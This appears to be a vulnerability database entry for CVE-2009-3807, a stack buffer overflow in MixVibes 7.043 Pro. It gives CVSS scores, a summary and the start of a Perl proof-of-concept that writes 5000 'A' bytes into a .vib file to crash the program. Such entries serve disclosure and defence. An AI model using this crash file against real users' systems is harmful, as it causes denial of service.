9.3
CVSSv2

CVE-2009-3807

Published: 27/10/2009 Updated: 19/09/2017
CVSS v2 Base Score: 9.3 | Impact Score: 10 | Exploitability Score: 8.6
VMScore: 935
Vector: AV:N/AC:M/Au:N/C:C/I:C/A:C

Vulnerability Summary

Stack-based buffer overflow in MixVibes 7.043 Pro allows remote malicious users to cause a denial of service (crash) via a long string in a .vib file.

Vulnerable Product Search on Vulmon Subscribe to Product

mixvibes mixvibes 7.043

Exploits

#!/usr/bin/perl # Found By :: HACK4LOVE # MixVibes Pro 7043 (vib File) Local Stack Overflow PoC # wwwsoftpediacom/progDownload/MixVibes-Pro-Download-3074html ######################################################################################## my $crash="\x41" x 5000; open(myfile,'>>hack4lovevib'); print myfile $crash; ####### ...